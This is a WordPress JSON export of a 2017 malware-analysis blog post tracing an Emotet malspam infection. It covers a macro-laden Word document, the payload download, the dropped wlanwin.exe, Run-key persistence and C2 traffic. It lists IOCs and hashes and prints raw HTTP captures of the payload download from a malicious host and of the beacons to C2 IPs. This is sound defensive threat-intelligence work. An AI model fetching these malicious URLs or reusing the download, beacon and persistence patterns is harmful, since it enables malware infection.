{"id":1028,"date":"2017-11-16T13:39:43","date_gmt":"2017-11-16T13:39:43","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1028"},"modified":"2017-11-16T13:45:02","modified_gmt":"2017-11-16T13:45:02","slug":"2017-11-15-another-malspam-message-leads-to-new-emotet","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1028","title":{"rendered":"2017-11-15 Another Malspam Message Leads to New Emotet"},"content":{"rendered":"

This is just a quick writeup for an Emotet malspam that I found in Triton. Nothing to detailed or anything of the sort. I was not able to obtain the initial malicious binary (73077.exe) from the Word document, so after getting all the details, I went back on a clean VM to get that file. The file 73077.exe should be the same as the one listed below – 12961.exe. The artifacts from this can be found over at my Github here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

IOCs:
\n=====
\n172.81.117.237 \/ xanaxsleepingpills.website (GET \/Invoice-number-588962\/)
\n162.221.188.251 \/ www.medicinedistributor.com (GET \/UVRJ\/)
\n41.72.140.141:8080 (POST \/)
\n69.43.168.196:443 (POST \/)<\/p>\n

Artifacts:
\n=======
\nFile name: New invoice # 423184510.doc
\nFile size: 197KB
\nFile path: NA
\nMD5 hash: 7c53bf0f3eeac307791e6b19ef6568af
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/0de3f4380b642e59d0cde5570ed13bfc727000b94a034ce10e1f87bfac3fac79\/detection<\/a>
\nDetection ratio: 9 \/ 59
\nFirst Detected: 2017-11-15 17:41:02
\nPayload Security: http:\/\/www.hybrid-analysis.com\/sample\/0de3f4380b642e59d0cde5570ed13bfc727000b94a034ce10e1f87bfac3fac79?environmentId=100<\/a><\/p>\n

File name: 73077.exe\/12961.exe
\nFile size: 111KB
\nFile path: C:\\Users\\Public
\nMD5 hash: 95d26374ff9f3e798edb880c31dbc6d2
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/986ad045554091800249aec16f02271fbf56faaf349e1fae78bc46f3c5c707e3\/detection<\/a>
\nDetection ratio: 11 \/ 55
\nFirst Detected: 2017-11-16 09:18:20
\nPayload Security: NA<\/p>\n

File name: wlanwin.exe
\nFile size: 94KB
\nFile path: “C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\”
\nMD5 hash: 3e11228f187c0f0a7a9bb7a3beae8e89
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/3190f80b95d0a2679d8477b8ee7593e3b92e98d4ce95a6b328d42a61c60fe0c9\/detection<\/a>
\nDetection ratio: 23 \/ 68
\nFirst Detected: 2017-11-15 18:13:04
\nPayload Security: NA<\/p>\n

Analysis:
\n=======
\nThis is a pretty straight forward infection. The initial infection comes from a a malicious email (malspam) with a link that directs the end user to download a malicious Word document. <\/p>\n

Once this document has been downloaded, it asks the user to enable the macro which then triggers a chain of events as seen below.<\/p>\n

\"\"<\/a><\/p>\n

The Powershell command goes and downloads the file 73077.exe\/12961.exe and proceeds to execute it. <\/p>\n

\r\nGET \/UVRJ\/ HTTP\/1.1\r\nHost: www.medicinedistributor.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nX-Powered-By: PHP\/5.6.32\r\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\r\nPragma: no-cache\r\nContent-Type: application\/octet-stream\r\nContent-Disposition: attachment; filename="s.exe"\r\nContent-Transfer-Encoding: binary\r\nTransfer-Encoding: chunked\r\nDate: Wed, 15 Nov 2017 19:22:40 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nConnection: Keep-Alive\r\n\r\n2000\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n
It then proceeds to kill itself once it has spun up another child process of the same name, which then proceeds to create and execute the binary called “wlanwin.exe.” The interesting thing here is that this version of Emotet looks to be using some of the anti-sandbox techniques discussed by Trend Micro here<\/a>, which it turns out, if you create 3 of the files it is looking for, you can protect the endpoint from infection as discussed by Minerva here<\/a>. This version of Emotet looks to be using a modified version since it is not looking for the exact same files as mentioned in the above links as seen below.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
Once the “wlanwin.exe” process is up and running, we can see it calling out to the C2 via ports 443 and 8080 using the standard Emotet response of a fake 404 response.<\/p>\n
\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: 69.43.168.196:443\r\nContent-Length: 420\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n=.<q.V.!..=..+.. ......v.uC,q.....].....s.Fa[._(..{.....g&[..iO..).~....p...x{.A.....t.m.0}.......#y.zk0....'..*W.j\r\n..$(.z...q.]r.....Eh30.L...<$......B.+..2+"..8&.Q........h..Vs.\r\nj.*.<.?.B..Kej.\r\n.t.\tO.........%....i.......!Szb.2b`.....C.2....H......x........`._+_A ..$..a.....!n.ri..i..=...4mk..........|...&...U m.qG......;.I......V...v......0\tA.p..Y.gBq$6.x........1\\...~*.\r\n......2f.~.A'.o 7.....Hs.._.ng..^iW^.W.]Jy.\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Wed, 15 Nov 2017 19:22:48 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 132\r\nConnection: keep-alive\r\n\r\n%CU.....'.......r].L;G..R..j.#.V..<183........W..G.......Ak..s.....I..J.....d...7.....&...h...|.EZ..{.C|...D...[.r.[.B..7..\r\n.T......\r\n\r\n-----\r\n\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: 41.72.140.141:8080\r\nContent-Length: 388\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n\r\n...2=.u.w.............X..%...'...h.drc......g#..S.G....D....G.^....q.oK.,.w..4..........y.#g...7..<=..(t.H......@.+[-Q.....{...Z^.9t.)3......Op..e....#g.H..p...n...>\/.}.H.2...G.F$..!s..<.?bx...X.BC.\r\naI.6VDMS.60&\r\n.Q%......^..*....`....5@?>.....\\).<....uR \t..~r.uY.h..\r\n.0..wM..H.....H*%.<...Lt;.^-N..G5.k...3x....;...`.kr.m}...M......^.Dc.Qi:~..D..\r\n........$.e1'R.B..i..}...7._O.9F......gn\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Wed, 15 Nov 2017 19:38:24 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 132\r\nConnection: keep-alive\r\n\r\n%CU.....'.......r].L;G..R..j.#.V..<183........W..G.......Ak..s.....I..J.....d...7.....&...h...|.EZ..{.C|...D...[.r.[.B..7..\r\n.T......<\/pre>\n
Persistence is gained via a new key in the “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” pointing to “C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\wlanwin.exe” binary that is dropped on the system.<\/p>\n","protected":false},"excerpt":{"rendered":"
This is just a quick writeup for an Emotet malspam that I found in Triton. Nothing to detailed or anything of the sort. I was not able to obtain the initial malicious binary (73077.exe) from the Word document, so after getting all the details, I went back on a clean VM to get that file. The file 73077.exe should be the same as the one listed below – 12961.exe. The artifacts from this can be found over at my Github here. IOCs: ===== 172.81.117.237 \/ xanaxsleepingpills.website (GET \/Invoice-number-588962\/) 162.221.188.251 \/ www.medicinedistributor.com (GET \/UVRJ\/) 41.72.140.141:8080 (POST \/) 69.43.168.196:443 (POST \/) Artifacts:…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[12],"class_list":["post-1028","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-emotet"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1028","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1028"}],"version-history":[{"count":3,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1028\/revisions"}],"predecessor-version":[{"id":1035,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1028\/revisions\/1035"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1028"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1028"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1028"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}